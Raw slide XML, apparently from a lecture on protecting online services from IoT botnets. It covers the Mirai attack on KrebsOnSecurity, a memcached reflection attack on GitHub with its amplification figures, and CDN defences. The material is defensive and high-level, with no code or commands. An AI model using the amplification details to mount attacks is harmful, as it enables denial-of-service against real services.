        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="4571314" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="5224359" algn="l" defTabSz="130609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7.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tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.tiff"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.tiff"/></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ak.xyz.com/logo.pdf?id=832164328"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tiff"/><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0" y="1104326"/>
            <a:ext cx="11013186" cy="1609213"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protecting On-Line Services from the Internet of Compromised Things</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400050" y="3346825"/>
            <a:ext cx="14344650" cy="1486102"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Bruce Maggs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Duke University and Akamai Technologies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412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Krebs Blog KrebsOnSecurity.com Comes Under Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3644990"/>
            <a:ext cx="13167360" cy="3706406"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Krebs had recently reported on a web site called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> which purportedly offered to conduct cyberattacks for a fee.  After the report two Israeli men were arrested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Prolexic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> had been hosting KrebsOnSecurity.com pro-bono, until September 22, at which point it went down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Google took over on September 26.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="6887" t="67639" r="49616" b="11194"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="851337" y="1277008"/>
            <a:ext cx="4855780" cy="2096814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6075806" y="1221491"/>
            <a:ext cx="7823074" cy="1692771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>According to Krebs, the attackers used malware called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BotNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> of Internet of Things (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) devices by scanning for factory-default passwords.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3340792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Passwords Hardcoded into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BotNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Source</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24894" t="9915" r="25383" b="24957"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072729" y="1151466"/>
            <a:ext cx="9093201" cy="6451600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9635067" y="3674533"/>
            <a:ext cx="508000"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11420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55D5-B5AD-4B2B-A16F-792DC328A8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reflection attack on GitHub February 28, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B508E303-2114-4B86-99B5-443C84A00997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642620" y="1330642"/>
            <a:ext cx="13167360" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Packets with spoofed source address were sent to (50,000) open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>A 203-byte request packet can result in a 103MB response!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Filtered all traffic from UDP source port 11211.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89E1CE8A-806B-49F9-BE5F-03EA5106E491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="6944" t="42894" r="18750" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3962400"/>
            <a:ext cx="10871200" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3888049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Application Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1554480"/>
            <a:ext cx="11993880" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The attacker takes advantage of flaws in application implementations and hopes to steal, modify, or delete data, or otherwise compromise the server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="568882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127F-3952-4791-8C19-CB54630F9190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trend Towards Full-Site Delivery by CDNs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51D2B95-B0E1-4B62-A4B1-F138E1789E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Driven in part by need to protect against attacks (e.g., 2012-2013 “Operation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ababil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” campaign against U.S. banks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and in part to reduce latency through split-TCP optimization and overlays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To terminate TLS connections, CDNs hold the private keys for their customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1504584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descr="cloud copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3807018" y="2011680"/>
            <a:ext cx="7399010" cy="4970146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10957624" y="3651252"/>
            <a:ext cx="1879453" cy="1210628"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 5800 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 1703 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 2368 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 1562 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 5800 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 1703 h 10000"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 5800 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 1703 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 3703 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 190 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 276 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 5381 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 276 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 5381 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 59605"/>
              <a:gd name="connsiteY0" fmla="*/ 92 h 12187"/>
              <a:gd name="connsiteX1" fmla="*/ 54986 w 59605"/>
              <a:gd name="connsiteY1" fmla="*/ 1911 h 12187"/>
              <a:gd name="connsiteX2" fmla="*/ 59605 w 59605"/>
              <a:gd name="connsiteY2" fmla="*/ 12187 h 12187"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 59605"/>
              <a:gd name="connsiteY0" fmla="*/ 4816 h 16911"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 59605"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 16911"/>
              <a:gd name="connsiteX2" fmla="*/ 59605 w 59605"/>
              <a:gd name="connsiteY2" fmla="*/ 16911 h 16911"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 59605"/>
              <a:gd name="connsiteY0" fmla="*/ 4467 h 16911"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 59605"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 16911"/>
              <a:gd name="connsiteX2" fmla="*/ 59605 w 59605"/>
              <a:gd name="connsiteY2" fmla="*/ 16911 h 16911"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 68414"/>
              <a:gd name="connsiteY0" fmla="*/ 4467 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 68414"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 68414 w 68414"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 68414"/>
              <a:gd name="connsiteY0" fmla="*/ 4467 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 68414"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 68414 w 68414"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 14372"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 14372 w 14372"/>
              <a:gd name="connsiteY1" fmla="*/ 10276 h 10276"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14372" h="10276">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="457" y="360"/>
                  <a:pt x="10305" y="7758"/>
                  <a:pt x="14372" y="1027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9" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8468653" y="5747163"/>
            <a:ext cx="417970" cy="1652812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4912"/>
              <a:gd name="connsiteY0" fmla="*/ 8633 h 8633"/>
              <a:gd name="connsiteX1" fmla="*/ 4912 w 4912"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 8633"/>
              <a:gd name="connsiteX0" fmla="*/ 9944 w 19944"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 3580 w 19944"/>
              <a:gd name="connsiteY1" fmla="*/ 3493 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 19944 w 19944"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 98986 w 98986"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 92622 w 98986"/>
              <a:gd name="connsiteY1" fmla="*/ 18026 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 3333 w 98986"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 95653"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 89289 w 95653"/>
              <a:gd name="connsiteY1" fmla="*/ 18026 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 95653"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 10807 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 10807 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 11092 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 11092 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 101154"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 101154 w 101154"/>
              <a:gd name="connsiteY1" fmla="*/ 11472 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 101154"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95088 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 23678 h 23678"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 23678"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23678"/>
              <a:gd name="connsiteX0" fmla="*/ 93393 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 22063 h 22063"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 22063"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 22063"/>
              <a:gd name="connsiteX0" fmla="*/ 93675 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 21493 h 21493"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 21493"/>
